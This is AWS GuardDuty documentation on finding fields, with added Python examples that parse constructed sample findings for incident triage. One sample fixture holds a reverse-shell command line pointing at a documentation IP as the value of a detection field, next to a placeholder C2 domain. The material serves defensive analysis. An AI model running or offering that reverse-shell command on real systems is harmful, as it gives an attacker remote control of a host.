Finding details
In the Amazon GuardDuty console, you can view finding details in the finding summary section. Finding details vary based on the finding type.
There are two primary details that determine what kind of information is available for any finding. The first is the resource type, which can be Instance, AccessKey, S3Bucket, S3Object, KubernetesCluster, ECSCluster, Container, RDSDBInstance, or Lambda. The second is the resource role. For access key findings, the resource role is TARGET, meaning the resource was the target of suspicious activity. For instance findings, the resource role can also be ACTOR, which means that your resource was the actor carrying out the suspicious activity. This topic describes some of the commonly available details for findings.
Finding overview
A finding's Overview section contains the most basic identifying features of the finding, including the following information:
- Account ID – The ID of the AWS account in which the activity took place that prompted GuardDuty to generate this finding.
- Count – The number of times GuardDuty has aggregated an activity matching this pattern to this finding ID.
- Created at – The time and date when this finding was first created. If this value differs from Updated at, the activity has occurred multiple times and is an ongoing issue.
  Note
  Timestamps for findings in the GuardDuty console appear in your local time zone, while JSON exports and CLI outputs display timestamps in UTC.
- Finding ID – A unique identifier for this finding type and set of parameters. New occurrences of activity matching this pattern are aggregated to the same ID.
- Finding type – A formatted string representing the type of activity that triggered the finding. For more information, see GuardDuty finding format.
- Region – The AWS Region in which the finding was generated. For more information about supported Regions, see Regions and endpoints.
- Resource ID – The ID of the AWS resource against which the activity took place that prompted GuardDuty to generate this finding.
- Scan ID – Applicable to findings when GuardDuty Malware Protection for EC2 is enabled, this is the identifier of the malware scan that runs on the EBS volumes attached to the potentially compromised EC2 instance or container workload. For more information, see Malware Protection for EC2 finding details.
- Severity – A finding's assigned severity level of High, Medium, or Low. For more information, see Severity levels for GuardDuty findings.
- Updated at – The last time this finding was updated with new activity matching the pattern that prompted GuardDuty to generate this finding.
Resource
The Resource section gives details about the AWS resource that was involved in the activity that prompted the finding. The information available varies based on resource type and action type.
Resource role – The role of the AWS resource in the activity that prompted the finding. This value can be TARGET or ACTOR, and represents whether your resource was the target of the suspicious activity or the actor that performed the suspicious activity.
Resource type – The type of the affected resource. If multiple resources were involved, a finding can include multiple resource types. The resource types are Instance, AccessKey, S3Bucket, S3Object, KubernetesCluster, ECSCluster, Container, RDSDBInstance, and Lambda. Depending on the resource type, different finding details are available; the following sections describe the details available for each resource type.
RDS database (DB) user details
Note
This section is applicable to findings when you enable the RDS Protection feature in GuardDuty. For more information, see RDS Protection in GuardDuty.
The GuardDuty finding provides the following user and authentication details of the potentially compromised database.
- User – The user name used to make the anomalous login attempt.
- Application – The application name used to make the anomalous login attempt.
- Database – The name of the database instance involved in the anomalous login attempt.
- SSL – The version of Secure Sockets Layer (SSL) used for the connection.
- Auth method – The authentication method used by the user involved in the finding.
Runtime Monitoring finding details
Note
These details may be available only if GuardDuty generates one of the Runtime Monitoring finding types.
This section contains the runtime details such as process details and any required context. Process details describe information about the observed process and runtime context describes any additional information about the potentially suspicious activity.
Process details
- Name – The name of the process.
- Executable path – The absolute path of the process executable file.
- Executable SHA-256 – The SHA-256 hash of the process executable.
- Namespace PID – The process ID of the process in a secondary PID namespace other than the host-level PID namespace. For processes inside a container, it is the process ID observed inside the container.
- Present working directory – The present working directory of the process.
- Process ID – The ID assigned to the process by the operating system.
- Start time – The time when the process started. This is in UTC date string format (for example, 2023-03-22T19:37:20.168Z).
- UUID – The unique ID assigned to the process by GuardDuty.
- Parent UUID – The unique ID of the parent process. This ID is assigned to the parent process by GuardDuty.
- User – The user that executed the process.
- User ID – The ID of the user that executed the process.
- Effective user ID – The effective user ID of the process at the time of the event.
- Lineage – Information about the ancestors of the process. Each ancestor has the following fields:
  - Process ID – The ID assigned to the process by the operating system.
  - UUID – The unique ID assigned to the process by GuardDuty.
  - Executable path – The absolute path of the process executable file.
  - Effective user ID – The effective user ID of the process at the time of the event.
  - Parent UUID – The unique ID of the parent process. This ID is assigned to the parent process by GuardDuty.
  - Start time – The time when the process started.
  - Namespace PID – The process ID of the process in a secondary PID namespace other than the host-level PID namespace. For processes inside a container, it is the process ID observed inside the container.
  - User ID – The user ID of the user that executed the process.
  - Name – The name of the process.
Runtime context
Of the following fields, a generated finding includes only those that are relevant to the finding type.
- Mount Source – The path on the host that is mounted by the container.
- Mount Target – The path in the container that is mapped to the host directory.
- Filesystem Type – The type of the mounted filesystem.
- Flags – Options that control the behavior of the event involved in this finding.
- Modifying Process – Information about the process that created or modified a binary, script, or library inside a container at runtime.
- Modified At – The timestamp at which the process created or modified a binary, script, or library inside a container at runtime. This field is in the UTC date string format (for example, 2023-03-22T19:37:20.168Z).
- Library Path – The path to the new library that was loaded.
- LD Preload Value – The value of the LD_PRELOAD environment variable.
- Socket Path – The path to the Docker socket that was accessed.
- Runc Binary Path – The path to the runc binary.
- Release Agent Path – The path to the cgroup release agent file.
- Command Line Example – An example of the command line involved in the potentially suspicious activity.
- Tool Category – The category that the tool belongs to, for example Backdoor Tool, Pentest Tool, Network Scanner, or Network Sniffer.
- Tool Name – The name of the potentially suspicious tool.
- Script Path – The path to the executed script that generated the finding.
- Threat File Path – The suspicious path for which the threat intelligence details were found.
- Service Name – The name of the security service that has been disabled.
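The process and lineage fields above are enough to rebuild the ancestry of the observed process, which is usually the first thing an analyst wants from a Runtime Monitoring finding. The following is an added example (mine, not part of the GuardDuty documentation or any AWS tooling): it walks a constructed finding by its uuid/parentUuid links rather than trusting the serialization order, renders the chain, keeps only the runtime-context fields that actually carry a value, and flags any process whose effective user ID is 0 while its user ID is not. The sample finding, its process names, hash and address are constructed; the JSON key names are assumed to follow the service.runtimeDetails layout (process, lineage, context) of the finding JSON and should be checked against a real export.

```python
import json
from typing import Any

# Constructed sample finding for illustration (not a real GuardDuty export).
# Key names are assumed to follow service.runtimeDetails in the finding JSON;
# the hash, UUIDs and the reverse-shell address are placeholders.
SAMPLE_FINDING: dict[str, Any] = {
    "type": "Execution:Runtime/ReverseShell",
    "service": {"runtimeDetails": {
        "process": {
            "name": "bash", "executablePath": "/usr/bin/bash",
            "executableSha256": "0" * 64, "pid": 4242, "namespacePid": 17,
            "pwd": "/tmp", "startTime": "2023-03-22T19:37:20.168Z",
            "uuid": "proc-0003", "parentUuid": "proc-0002",
            "user": "app", "userId": 1000, "euid": 0,
            "lineage": [
                {"uuid": "proc-0002", "parentUuid": "proc-0001", "pid": 4100,
                 "namespacePid": 9, "name": "python3", "executablePath": "/usr/bin/python3",
                 "userId": 1000, "euid": 1000, "startTime": "2023-03-22T19:30:01.000Z"},
                {"uuid": "proc-0001", "parentUuid": "proc-0000", "pid": 3988,
                 "namespacePid": 1, "name": "containerd-shim",
                 "executablePath": "/usr/bin/containerd-shim-runc-v2",
                 "userId": 0, "euid": 0, "startTime": "2023-03-22T19:29:58.000Z"},
            ],
        },
        "context": {
            "commandLineExample": "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",
            "ldPreloadValue": "",   # empty: not relevant to this finding type
            "socketPath": None,
        },
    }},
}


def process_chain(finding: dict[str, Any]) -> list[dict[str, Any]]:
    """Return the ancestry, root ancestor first, observed process last.

    Lineage entries are indexed by the GuardDuty-assigned uuid and linked by
    parentUuid; a seen-set stops the walk on a malformed (cyclic) export.
    """
    proc = finding["service"]["runtimeDetails"]["process"]
    by_uuid = {entry["uuid"]: entry for entry in proc.get("lineage", [])}
    chain, seen = [proc], {proc["uuid"]}
    parent = proc.get("parentUuid")
    while parent in by_uuid and parent not in seen:
        entry = by_uuid[parent]
        chain.append(entry)
        seen.add(parent)
        parent = entry.get("parentUuid")
    chain.reverse()
    return chain


def format_chain(chain: list[dict[str, Any]]) -> str:
    """Render the chain as 'name(pid=.., nspid=.., euid=..) -> ...' for a ticket."""
    return " -> ".join(
        f"{p['name']}(pid={p['pid']}, nspid={p.get('namespacePid')}, euid={p.get('euid')})"
        for p in chain
    )


def present_context(finding: dict[str, Any]) -> dict[str, Any]:
    """Keep only runtime-context fields that carry a value.

    A finding includes only the context fields relevant to its type, and an
    export may still serialize the rest as null or empty strings.
    """
    ctx = finding["service"]["runtimeDetails"].get("context", {})
    return {k: v for k, v in ctx.items() if v not in (None, "", [], {})}


def gained_root_in_chain(chain: list[dict[str, Any]]) -> bool:
    """True if some process runs with euid 0 while its real user ID is not 0.

    That combination is what a setuid binary or a breakout leaves behind; the
    position in the chain shows where the privilege boundary was crossed.
    """
    return any(p.get("euid") == 0 and p.get("userId") not in (None, 0) for p in chain)


if __name__ == "__main__":
    chain = process_chain(SAMPLE_FINDING)
    print(format_chain(chain))
    print(json.dumps(present_context(SAMPLE_FINDING), indent=2))
    print("privilege boundary crossed:", gained_root_in_chain(chain))
```

The chain is built from the links, not from list order, because the lineage array is the only place the ancestors appear and nothing in the format promises that it is sorted.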
EBS volumes scan details
Note
This section is applicable to findings when you turn on the GuardDuty-initiated malware scan in GuardDuty Malware Protection for EC2.
The EBS volumes scan provides details about the EBS volume attached to the potentially compromised EC2 instance or container workload.
- Scan ID – The identifier of the malware scan.
- Scan started at – The date and time when the malware scan started.
- Scan completed at – The date and time when the malware scan completed.
- Trigger Finding ID – The finding ID of the GuardDuty finding that initiated this malware scan.
- Sources – The potential values are Bitdefender and Amazon.
- Scan detections – The complete view of details and results for each malware scan.
  - Scanned item count – The total number of scanned files. It provides details such as totalGb, files, and volumes.
  - Threats detected item count – The total number of malicious files detected during the scan.
  - Highest severity threat details – The details of the highest severity threat detected during the scan and the number of malicious files. It provides details such as severity, threatName, and count.
  - Threats detected by Name – The container element grouping threats of all severity levels. It provides details such as itemCount, uniqueThreatNameCount, shortened, and threatNames.
Malware Protection for EC2 finding details
Note
This section is applicable to findings when you turn on the GuardDuty-initiated malware scan in GuardDuty Malware Protection for EC2.
When the Malware Protection for EC2 scan detects malware, you can view the scan details by selecting the corresponding finding on the Findings page in the GuardDuty console at https://console.aws.amazon.com/guardduty/.
Note
The GuardDutyFindingDetected tag on a snapshot specifies that the snapshot contains malware.
The following information is available under the Threats detected section in the details panel.
- Name – The name of the threat, obtained by grouping the files by detection.
- Severity – The severity of the threat detected.
- Hash – The SHA-256 hash of the file.
- File path – The location of the malicious file in the EBS volume.
- File name – The name of the file in which the threat was detected.
- Volume ARN – The ARN of the scanned EBS volume.
The following information is available under the Malware scan details section in the details panel.
- Scan ID – The scan ID of the malware scan.
- Scan started at – The date and time when the scan started.
- Scan completed at – The date and time when the scan completed.
- Files scanned – The total number of scanned files and directories.
- Total GB scanned – The amount of storage scanned during the process.
- Trigger finding ID – The finding ID of the GuardDuty finding that initiated this malware scan.
The following information is available under the Volume details section in the details panel.
- Volume ARN – The Amazon Resource Name (ARN) of the volume.
- Snapshot ARN – The ARN of the snapshot of the EBS volume.
- Status – The scan status of the volume, such as Running, Skipped, or Completed.
- Encryption type – The type of encryption used to encrypt the volume. For example, CMCMK.
- Device name – The name of the device. For example, /dev/xvda.
Malware Protection for S3 finding details
The following malware scan details are available when you enable both GuardDuty and Malware Protection for S3 in your AWS account:
- Threats – A list of threats detected during the malware scan. For information about the number of threats that a finding can include, see Quotas in Malware Protection for S3.
  - Item path – A list of nested item path and hash details of the scanned S3 object.
    - Nested item path – Item path within the scanned S3 object where the threat was detected. The value of this field is available only if the top-level object is an archive and the threat was detected inside the archive.
    - Hash – Hash of the threat detected in this finding.
  - Sources – The potential values are Bitdefender and Amazon.
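The EC2 and S3 malware findings above describe the same thing (a detected file with a name, a hash and a location) in two different shapes. The following is an added example (mine, not part of the GuardDuty documentation or any AWS tooling) that flattens both shapes into one row per detected file, summarizes severities, reports whether the EC2 threat list was shortened, and intersects hashes across findings to link an infected volume back to the S3 object that carried the file. The findings, ARNs, hashes and file names are constructed; the JSON key names are assumed to follow the service.ebsVolumeScanDetails and service.malwareScanDetails layouts of the finding JSON and should be checked against a real export.

```python
from collections import Counter
from typing import Any

# Constructed sample findings for illustration (not real GuardDuty exports).
# Key names are assumed to follow service.ebsVolumeScanDetails (EC2) and
# service.malwareScanDetails (S3); ARNs, hashes and file names are placeholders.
VOL_A = "arn:aws:ec2:us-east-1:111122223333:volume/vol-0aaa"
VOL_B = "arn:aws:ec2:us-east-1:111122223333:volume/vol-0bbb"
EC2_FINDING: dict[str, Any] = {
    "type": "Execution:EC2/MaliciousFile",
    "service": {"ebsVolumeScanDetails": {
        "scanId": "scan-0001", "triggerFindingId": "f-trigger",
        "sources": ["Bitdefender", "Amazon"],
        "scanDetections": {
            "scannedItemCount": {"totalGb": 8, "files": 120001, "volumes": 2},
            "threatsDetectedItemCount": {"files": 3},
            "highestSeverityThreatDetails": {"severity": "HIGH", "threatName": "Trojan.Example.A", "count": 2},
            "threatDetectedByName": {
                "itemCount": 3, "uniqueThreatNameCount": 2, "shortened": True,
                "threatNames": [
                    {"name": "Trojan.Example.A", "severity": "HIGH", "itemCount": 2, "filePaths": [
                        {"filePath": "/tmp/.x/kinsing", "fileName": "kinsing", "hash": "a" * 64, "volumeArn": VOL_A},
                        {"filePath": "/var/tmp/x86", "fileName": "x86", "hash": "b" * 64, "volumeArn": VOL_A}]},
                    {"name": "PUA.Example.B", "severity": "LOW", "itemCount": 1, "filePaths": [
                        {"filePath": "/home/app/tool.sh", "fileName": "tool.sh", "hash": "c" * 64, "volumeArn": VOL_B}]},
                ]}}}},
}
S3_FINDING: dict[str, Any] = {
    "type": "Object:S3/MaliciousFile",
    "service": {"malwareScanDetails": {"threats": [
        {"name": "Trojan.Example.A", "source": "Bitdefender",
         "itemPaths": [{"nestedItemPath": "payload/update.exe", "hash": "a" * 64}]},
        {"name": "Test.Example.C", "source": "Amazon", "itemPaths": [{"hash": "d" * 64}]},
    ]}},
}


def normalize_threats(finding: dict[str, Any]) -> list[dict[str, Any]]:
    """Flatten either scan layout into one row per detected file.

    EC2 scans group files under threat names; S3 scans list threats with the
    path inside the object. Both end up with the same columns so the same
    downstream logic (hash blocklists, ticket tables) applies to both.
    """
    svc = finding["service"]
    rows: list[dict[str, Any]] = []
    ebs = svc.get("ebsVolumeScanDetails")
    if ebs:
        source = "+".join(ebs.get("sources", []))
        for t in ebs["scanDetections"]["threatDetectedByName"].get("threatNames", []):
            for fp in t.get("filePaths", []):
                rows.append({"name": t["name"], "severity": t.get("severity"), "hash": fp.get("hash"),
                             "path": fp.get("filePath"), "location": fp.get("volumeArn"), "source": source})
    s3 = svc.get("malwareScanDetails")
    if s3:
        for t in s3.get("threats", []):
            # A plain (non-archive) object carries no nested path, only a hash.
            for item in t.get("itemPaths") or [{}]:
                rows.append({"name": t["name"], "severity": None, "hash": item.get("hash"),
                             "path": item.get("nestedItemPath"), "location": "s3", "source": t.get("source")})
    return rows


def is_truncated(finding: dict[str, Any]) -> bool:
    """True when the EC2 threat list was shortened: the finding is then not the
    complete scan result and the analyst must consult the scan record."""
    ebs = finding["service"].get("ebsVolumeScanDetails")
    return bool(ebs and ebs["scanDetections"]["threatDetectedByName"].get("shortened"))


def severity_histogram(rows: list[dict[str, Any]]) -> Counter:
    """Count rows per severity; S3 rows carry no severity and count as UNKNOWN."""
    return Counter(r["severity"] or "UNKNOWN" for r in rows)


def shared_hashes(*findings: dict[str, Any]) -> set[str]:
    """Hashes present in every finding given: the pivot that ties an EBS
    infection to the S3 object that delivered the file."""
    sets = [{r["hash"] for r in normalize_threats(f) if r["hash"]} for f in findings]
    return set.intersection(*sets) if sets else set()


def volumes_to_isolate(rows: list[dict[str, Any]]) -> list[str]:
    """Distinct EBS volume ARNs with at least one detected file."""
    return sorted({r["location"] for r in rows if r["location"] and r["location"].startswith("arn:aws:ec2")})


if __name__ == "__main__":
    rows = normalize_threats(EC2_FINDING) + normalize_threats(S3_FINDING)
    for r in rows:
        print(r)
    print(severity_histogram(rows), is_truncated(EC2_FINDING))
    print(shared_hashes(EC2_FINDING, S3_FINDING), volumes_to_isolate(rows))
```

Treat the shortened flag as a hard stop before closing a ticket on the strength of the finding alone: when it is set, files exist on the volume that the finding does not list.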
Action
A finding's Action gives details about the type of activity that triggered the finding. The information available varies based on action type.
Action type – The finding activity type. This value can be NETWORK_CONNECTION, PORT_PROBE, DNS_REQUEST, AWS_API_CALL, or RDS_LOGIN_ATTEMPT. The information available varies based on action type:
- NETWORK_CONNECTION – Indicates that network traffic was exchanged between the identified EC2 instance and the remote host. This action type has the following additional information:
  - Connection direction – The network connection direction observed in the activity that prompted GuardDuty to generate the finding. The values can be one of the following:
    - INBOUND – Indicates that a remote host initiated a connection to a local port on the identified EC2 instance in your account.
    - OUTBOUND – Indicates that the identified EC2 instance initiated a connection to a remote host.
    - UNKNOWN – Indicates that GuardDuty could not determine the direction of the connection.
  - Protocol – The network connection protocol observed in the activity that prompted GuardDuty to generate the finding.
  - Local IP – The original source IP address of the traffic that triggered the finding. This value distinguishes the original source of the traffic from the IP address of an intermediate layer through which the traffic flows, for example the IP address of an EKS pod as opposed to the IP address of the instance on which the pod is running.
  - Blocked – Indicates whether the targeted port is blocked.
- PORT_PROBE – Indicates that a remote host probed the identified EC2 instance on multiple open ports. This action type has the following additional information:
  - Local IP – The original source IP address of the traffic that triggered the finding. This value distinguishes the original source of the traffic from the IP address of an intermediate layer through which the traffic flows, for example the IP address of an EKS pod as opposed to the IP address of the instance on which the pod is running.
  - Blocked – Indicates whether the targeted port is blocked.
- DNS_REQUEST – Indicates that the identified EC2 instance queried a domain name. This action type has the following additional information:
  - Protocol – The network connection protocol observed in the activity that prompted GuardDuty to generate the finding.
  - Blocked – Indicates whether the targeted port is blocked.
- AWS_API_CALL – Indicates that an AWS API was invoked. This action type has the following additional information:
  - API – The name of the API operation that was invoked and thus prompted GuardDuty to generate this finding.
    Note
    These operations can also include non-API events captured by AWS CloudTrail. For more information, see Non-API events captured by CloudTrail.
  - User Agent – The user agent that made the API request. This value tells you whether the call was made from the AWS Management Console, an AWS service, the AWS SDKs, or the AWS CLI.
  - Error code – If the finding was triggered by a failed API call, this displays the error code for that call.
  - Service name – The DNS name of the AWS service whose API was invoked, for example s3.amazonaws.com.
- RDS_LOGIN_ATTEMPT – Indicates that a login attempt was made to the potentially compromised database from a remote IP address. This action type has the following additional information:
  - IP address – The remote IP address that was used to make the potentially suspicious login attempt.
Actor or Target
A finding has an Actor section if the resource role was TARGET. This indicates that your resource was targeted by suspicious activity, and the Actor section contains details about the entity that targeted your resource.
A finding has a Target section if the resource role was ACTOR. This indicates that your resource was involved in suspicious activity against a remote host, and this section contains information on the IP or domain that your resource targeted.
The information available in the Actor or Target section can include the following:
- Affiliated – Details about whether the AWS account of the remote API caller is related to your GuardDuty environment. If this value is true, the API caller is affiliated to your account in some manner; if false, the API caller is from outside your environment.
- Remote Account ID – The ID of the AWS account that owns the outbound IP address used to access your resource.
- IP address – The IP address involved in the activity that prompted GuardDuty to generate the finding.
- Location – Location information for the IP address involved in the activity that prompted GuardDuty to generate the finding.
- Organization – ISP organization information of the IP address involved in the activity that prompted GuardDuty to generate the finding.
- Port – The port number involved in the activity that prompted GuardDuty to generate the finding.
- Domain – The domain involved in the activity that prompted GuardDuty to generate the finding.
- Domain with suffix – The second- and top-level domain involved in an activity that potentially prompted GuardDuty to generate the finding. For a list of top-level and second-level domains, see the public suffix list.
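Whether the remote IP or domain in a finding is something to block inbound or something to block on egress depends on combining the action type with the resource role described above. The following is an added example (mine, not part of the GuardDuty documentation or any AWS tooling) that reads service.action and service.resourceRole from constructed findings, extracts the remote party for each of the five action types, labels it actor or target according to the rules above, and sorts the resulting indicators into inbound-deny and egress-deny sets. The findings, IDs, addresses (RFC 5737 documentation ranges) and domain are constructed; the JSON key names are assumed to match the finding JSON layout and should be checked against a real export.

```python
from typing import Any

# Constructed sample findings for illustration (not real GuardDuty exports).
# Key names are assumed to follow service.resourceRole / service.action in the
# finding JSON; IPs are RFC 5737 documentation addresses, the domain a placeholder.
SAMPLE_FINDINGS: list[dict[str, Any]] = [
    {"id": "f-1", "type": "UnauthorizedAccess:EC2/SSHBruteForce", "severity": 2,
     "service": {"resourceRole": "TARGET", "action": {
         "actionType": "NETWORK_CONNECTION",
         "networkConnectionAction": {
             "connectionDirection": "INBOUND", "protocol": "TCP", "blocked": False,
             "localIpDetails": {"ipAddressV4": "10.0.1.15"}, "localPortDetails": {"port": 22},
             "remoteIpDetails": {"ipAddressV4": "198.51.100.23"}, "remotePortDetails": {"port": 51544}}}}},
    {"id": "f-2", "type": "Backdoor:EC2/C&CActivity.B!DNS", "severity": 8,
     "service": {"resourceRole": "ACTOR", "action": {
         "actionType": "DNS_REQUEST",
         "dnsRequestAction": {"domain": "c2.example.net", "protocol": "UDP", "blocked": False}}}},
    {"id": "f-3", "type": "Recon:IAMUser/MaliciousIPCaller", "severity": 5,
     "service": {"resourceRole": "TARGET", "action": {
         "actionType": "AWS_API_CALL",
         "awsApiCallAction": {
             "api": "ListBuckets", "serviceName": "s3.amazonaws.com",
             "errorCode": "AccessDenied", "userAgent": "aws-cli/2.15.0",
             "remoteIpDetails": {"ipAddressV4": "203.0.113.77"},
             "remoteAccountDetails": {"accountId": "111122223333", "affiliated": False}}}}},
    {"id": "f-4", "type": "Recon:EC2/PortProbeUnprotectedPort", "severity": 2,
     "service": {"resourceRole": "TARGET", "action": {
         "actionType": "PORT_PROBE",
         "portProbeAction": {"blocked": False, "portProbeDetails": [
             {"localPortDetails": {"port": 3389}, "remoteIpDetails": {"ipAddressV4": "192.0.2.9"}},
             {"localPortDetails": {"port": 445}, "remoteIpDetails": {"ipAddressV4": "192.0.2.9"}},
             {"localPortDetails": {"port": 22}, "remoteIpDetails": {"ipAddressV4": "192.0.2.10"}}]}}}},
]


def remote_party(finding: dict[str, Any]) -> dict[str, Any]:
    """Pull the remote side out of service.action and name the role it played.

    resourceRole describes *your* resource: TARGET means the remote party is
    the actor (the console's Actor section); ACTOR means the remote party is
    what your resource went after (the console's Target section).
    """
    svc = finding["service"]
    action = svc["action"]
    kind = action["actionType"]
    out: dict[str, Any] = {"action": kind, "remote_ips": [], "domain": None,
                           "remote_role": "actor" if svc.get("resourceRole") == "TARGET" else "target"}
    if kind == "NETWORK_CONNECTION":
        net = action["networkConnectionAction"]
        out["direction"] = net.get("connectionDirection", "UNKNOWN")
        out["blocked"] = net.get("blocked")
        out["remote_ips"] = [net["remoteIpDetails"]["ipAddressV4"]]
        out["local_ip"] = net.get("localIpDetails", {}).get("ipAddressV4")
        out["ports"] = (net.get("localPortDetails", {}).get("port"),
                        net.get("remotePortDetails", {}).get("port"))
    elif kind == "PORT_PROBE":
        probe = action["portProbeAction"]
        details = probe.get("portProbeDetails", [])
        out["direction"] = "INBOUND"  # a probe is by definition remote -> local
        out["blocked"] = probe.get("blocked")
        out["remote_ips"] = sorted({d["remoteIpDetails"]["ipAddressV4"] for d in details})
        out["probed_ports"] = sorted({d["localPortDetails"]["port"] for d in details})
    elif kind == "DNS_REQUEST":
        dns = action["dnsRequestAction"]
        out["domain"] = dns["domain"]
        out["blocked"] = dns.get("blocked")
    elif kind == "AWS_API_CALL":
        api = action["awsApiCallAction"]
        acct = api.get("remoteAccountDetails", {})
        out["api"] = f'{api.get("serviceName")}:{api["api"]}'
        out["error_code"] = api.get("errorCode")
        out["user_agent"] = api.get("userAgent")
        ip = api.get("remoteIpDetails", {}).get("ipAddressV4")
        out["remote_ips"] = [ip] if ip else []
        out["remote_account"] = acct.get("accountId")
        out["affiliated"] = acct.get("affiliated")
    elif kind == "RDS_LOGIN_ATTEMPT":
        out["remote_ips"] = [action["rdsLoginAttemptAction"]["remoteIpDetails"]["ipAddressV4"]]
    else:
        raise ValueError(f"unknown actionType {kind!r}")
    return out


def triage_line(finding: dict[str, Any]) -> str:
    """One-line summary of the kind an on-call engineer pastes into a ticket."""
    r = remote_party(finding)
    where = r["domain"] or ", ".join(r["remote_ips"])
    return f"{finding['id']} sev={finding['severity']} {finding['type']}: {r['action']} {r['remote_role']}={where}"


def iocs(findings: list[dict[str, Any]]) -> dict[str, set[str]]:
    """Split indicators by the role the remote party played.

    Actor IPs are candidates for an inbound deny list; target domains and IPs
    belong in egress filtering and DNS firewall rules. Mixing the two blocks
    the wrong direction and leaves the real problem in place.
    """
    sets: dict[str, set[str]] = {"actor": set(), "target": set()}
    for f in findings:
        r = remote_party(f)
        sets[r["remote_role"]].update(r["remote_ips"])
        if r["domain"]:
            sets[r["remote_role"]].add(r["domain"])
    return sets


if __name__ == "__main__":
    for f in SAMPLE_FINDINGS:
        print(triage_line(f))
    print(iocs(SAMPLE_FINDINGS))
```

For NETWORK_CONNECTION findings the local IP is kept alongside the remote one because, on an EKS node, the pod address it carries is what identifies the workload to remediate, not the instance address shown in the Resource section.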
Additional information
All findings have an Additional information section that can include the following information:
- Threat list name – The name of the threat list that includes the IP address or the domain name involved in the activity that prompted GuardDuty to generate the finding.
- Sample – A true or false value that indicates whether this is a sample finding.
- Archived – A true or false value that indicates whether this finding has been archived.
- Unusual – Activity details that were not observed historically. These can include an unusual (previously not observed) user, location, time, bucket, login behavior, or ASN Org.
- Unusual protocol – The network connection protocol involved in the activity that prompted GuardDuty to generate the finding.
- Agent details – Details about the security agent that is currently deployed on the EKS cluster in your AWS account. This is only applicable to EKS Runtime Monitoring finding types.
  - Agent version – The version of the GuardDuty security agent.
  - Agent Id – The unique identifier of the GuardDuty security agent.
Evidence
Findings based on threat intelligence have an Evidence section that includes the following information:
- Threat intelligence details – The name of the threat list on which the recognized Threat name appears.
- Threat name – The name of the malware family or other identifier that is associated with the threat.
- Threat file SHA256 – The SHA-256 hash of the file that generated the finding.
Anomalous behavior
Finding types that end in AnomalousBehavior indicate that the finding was generated by the GuardDuty anomaly detection machine learning (ML) model. The ML model evaluates all API requests to your account and identifies anomalous events that are associated with tactics used by adversaries. The ML model tracks various factors of the API request, such as the user that made the request, the location the request was made from, and the specific API that was requested.
Details about which factors of the API request are unusual for the CloudTrail user identity that invoked the request can be found in the finding details. The identities are defined by the CloudTrail userIdentity element, and the possible values are Root, IAMUser, AssumedRole, FederatedUser, AWSAccount, or AWSService.
In addition to the details available for all GuardDuty findings that are associated with API activity, AnomalousBehavior findings have additional details that are outlined in the following section. These details can be viewed in the console and are also available in the finding's JSON.
- Anomalous APIs – A list of API requests that were invoked by the user identity in proximity to the primary API request associated with the finding. This pane further breaks down the details of the API event in the following ways.
  - The first API listed is the primary API, which is the API request associated with the highest-risk observed activity. This is the API that triggered the finding and correlates to the attack stage of the finding type. This is also the API that is detailed under the Action section in the console, and in the finding's JSON.
  - Any other APIs listed are additional anomalous APIs from the listed user identity observed in proximity to the primary API. If there is only one API on the list, the ML model did not identify any additional API requests from that user identity as anomalous.
  - The list of APIs is divided based on whether an API was called successfully or unsuccessfully, meaning an error response was received. The type of error response received is listed above each unsuccessfully called API. Possible error response types are: access denied, access denied exception, auth failure, instance limit exceeded, invalid permission - duplicate, invalid permission - not found, and operation not permitted.
  - APIs are categorized by their associated service.
  Note
  For more context, choose Historical APIs to view the details about the top APIs, to a maximum of 20, usually seen for both the user identity and all users within the account. The APIs are marked Rare (less than once a month), Infrequent (a few times a month), or Frequent (daily to weekly), depending on how often they are used within your account.
- Unusual Behavior (Account) – This section gives additional details about the profiled behavior for your account. The information tracked in this panel includes:
  - ASN Org – The ASN Org that the anomalous API call was made from.
  - User Name – The name of the user that made the anomalous API call.
  - User Agent – The user agent used to make the anomalous API call. The user agent is the method used to make the call, such as aws-cli or Botocore.
  - User Type – The type of user that made the anomalous API call. Possible values are AWS_SERVICE, ASSUMED_ROLE, IAM_USER, or ROLE.
  - Bucket – The name of the S3 bucket that is being accessed.
- Unusual Behavior (User Identity) – This section gives additional details about the profiled behavior for the user identity involved with the finding. When a behavior isn't identified as historical, the GuardDuty ML model hasn't previously seen this user identity making this API call in this way within the training period. The following additional details about the user identity are available:
  - ASN Org – The ASN Org the anomalous API call was made from.
  - User Agent – The user agent used to make the anomalous API call. The user agent is the method used to make the call, such as aws-cli or Botocore.
  - Bucket – The name of the S3 bucket that is being accessed.
- Unusual Behavior (Bucket) – This section gives additional details about the profiled behavior for the S3 bucket associated with the finding. When a behavior isn't identified as historical, the GuardDuty ML model hasn't previously seen API calls made to this bucket in this way within the training period. The information tracked in this section includes:
  - ASN Org – The ASN Org the anomalous API call was made from.
  - User Name – The name of the user that made the anomalous API call.
  - User Agent – The user agent used to make the anomalous API call. The user agent is the method used to make the call, such as aws-cli or Botocore.
  - User Type – The type of user that made the anomalous API call. Possible values are AWS_SERVICE, ASSUMED_ROLE, IAM_USER, or ROLE.
  Note
  For more context on historical behaviors, choose Historical behavior in the Unusual Behavior (Account), (User Identity), or (Bucket) section to view details about the expected behavior in your account in each of the following categories: Rare (less than once a month), Infrequent (a few times a month), or Frequent (daily to weekly), depending on how often each value is observed within your account.
- Unusual Behavior (Database) – This section provides additional details about the profiled behavior for the database instance associated with the finding. When a behavior isn't identified as historical, the GuardDuty ML model hasn't previously seen a login attempt made to this database instance in this way within the training period. The information tracked for this section in the finding panel includes:
  - User name – The user name used to make the anomalous login attempt.
  - ASN Org – The ASN Org that the anomalous login attempt was made from.
  - Application name – The application name used to make the anomalous login attempt.
  - Database name – The name of the database instance involved in the anomalous login attempt.
  Note
  The Historical behavior section provides more context on the previously observed User names, ASN Orgs, Application names, and Database names for the associated database. Each unique value has an associated count representing the number of times this value was observed in a successful login event.
- Unusual behavior (Account Kubernetes cluster, Kubernetes namespace, and Kubernetes username) – This section provides additional details about the profiled behavior for the Kubernetes cluster and namespace associated with the finding. When a behavior isn't identified as historical, the GuardDuty ML model hasn't previously observed this account, cluster, namespace, or username in this way. The information tracked for this section in the finding panel includes:
  - Username – The user that called the Kubernetes API associated with the finding.
  - Impersonated Username – The user being impersonated by username.
  - Namespace – The Kubernetes namespace within the Amazon EKS cluster where the action occurred.
  - User Agent – The user agent associated with the Kubernetes API call. The user agent is the method used to make the call, such as kubectl.
  - API – The Kubernetes API called by username within the Amazon EKS cluster.
  - ASN Information – The ASN information, such as Organization and ISP, associated with the IP address of the user making this call.
  - Day of week – The day of the week when the Kubernetes API call was made.
